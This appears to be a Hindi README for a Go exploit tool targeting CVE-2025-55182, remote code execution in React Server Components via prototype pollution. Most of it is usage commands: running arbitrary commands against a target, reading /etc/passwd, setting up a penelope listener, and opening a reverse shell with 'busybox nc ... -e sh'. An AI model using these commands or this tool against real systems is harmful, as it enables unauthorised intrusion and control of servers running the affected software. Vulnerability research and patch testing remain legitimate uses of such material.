
CVE-2025-55182 के लिए Go-आधारित शोषण, प्रोटोटाइप प्रदूषण के माध्यम से React Server Components में रिमोट कोड एक्ज़ीक्यूशन प्राप्त करता है। आर्बिट्रेरी कमांड निष्पादन और रिवर्स शेल पेलोड का समर्थन करता है।
React Server Components में प्रोटोटाइप प्रदूषण के माध्यम से RCE के लिए एक्सप्लॉइट।
go run main.go -t <target> -c <command>
go run main.go -t http://127.0.0.1 -c "id"
go run main.go -t http://127.0.0.1 -c "ls -la"
go run main.go -t http://127.0.0.1 -c "cat /etc/passwd"
रिवर्स शेल सेट करें
penelope -i 0.0.0.0 -p 1337
busybox का उपयोग करें:
go run main.go -t http://127.0.0.1 -c "busybox nc 127.0.0.1 1337 -e sh"
go build -o exploit .